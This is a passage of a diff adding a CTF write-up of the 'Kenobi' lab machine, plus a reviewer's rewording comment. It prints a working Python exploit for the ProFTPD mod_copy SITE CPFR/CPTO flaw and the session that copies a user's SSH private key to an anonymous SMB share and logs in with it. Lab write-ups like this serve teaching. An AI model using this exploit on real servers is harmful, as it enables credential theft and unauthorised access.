content/post/kenobi-boot2-root-writeup.md

```diff
@@ -0,0 +1,268 @@
+
+```python
+import socket
+import sys
+
+if(len(sys.argv) < 4):
+    print('\n Usage : exploit.py server directory cmd')
+else:
+    server = sys.argv[1] # vulnerable server
+    src = sys.argv[2] # source file to move
+    dest = sys.argv[3] # new destination of source file
+
+    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
+        s.connect((server, 21))
+        s.recv(1024)
+        print('[ + ] Connected to server [ + ]\n')
+        s.send(f'site cpfr {src} \n'.encode())
+        s.recv(1024)
+        s.send(f'site cpto {dest} \n'.encode())
+        s.recv(1024)
+```
+
+```
+root@kali:~/exploit# python3 exploit.py $ATTACKTARGET '/home/kenobi/.ssh/id_rsa' '/home/kenobi/share/id_rsa'
+[ + ] Connected to server [ + ]
+
+root@kali:~# smbclient //$ATTACKTARGET/anonymous
+Enter WORKGROUP\root's password: 
+Try "help" to get a list of possible commands.
+smb: \> ls
+  .                                   D        0  Sun Nov 15 00:53:15 2020
+  ..                                  D        0  Wed Sep  4 10:56:07 2019
+  id_rsa                              N     1675  Sun Nov 15 00:53:15 2020
+  log.txt                             N    12237  Wed Sep  4 10:49:09 2019
+
+		9204224 blocks of size 1024. 6877112 blocks available
+smb: \> get id_rsa 
+getting file \id_rsa of size 1675 as id_rsa (817.8 KiloBytes/sec) (average 817.9 KiloBytes/sec)
+smb: \> 
+root@kali:~# mv id_rsa ~/.ssh/kenobi && chmod 600 ~/.ssh/kenobi
+root@kali:~# ssh kenobi@$ATTACKTARGET -i ~/.ssh/kenobi 
+load pubkey "/root/.ssh/kenobi": invalid format
+The authenticity of host '10.10.221.157 (10.10.221.157)' can't be established.
+ECDSA key fingerprint is SHA256:uUzATQRA9mwUNjGY6h0B/wjpaZXJasCPBY30BvtMsPI.
+Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+Warning: Permanently added '10.10.221.157' (ECDSA) to the list of known hosts.
+Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)
+
+ * Documentation:  https://help.ubuntu.com
+ * Management:     https://landscape.canonical.com
+ * Support:        https://ubuntu.com/advantage
+
+103 packages can be updated.
+65 updates are security updates.
+
+
+Last login: Wed Sep  4 07:10:15 2019 from 192.168.1.147
+To run a command as administrator (user "root"), use "sudo <command>".
+See "man sudo_root" for details.
+
+kenobi@kenobi:~$
+```
+
+Success! I had a local account on the host!
+
+#### Escalating privileges
+I began to poke around on the host and managed to find a flag `user.txt` sitting right in kenobi's home directory. I ran through my usual CTF local enumeration steps including checking the host version, checking for sudo privs, etc... when I noticed a binary I wasn't familiar when checking for files with SUID bits. I've truncated the output a bit for clarity.
```

Comment:
I followed my usual CTF local enumerating steps, which included checking the host version, sudo privs, etc. I noticed a binary I wasn't familiar with when checking for files with the SUID bits.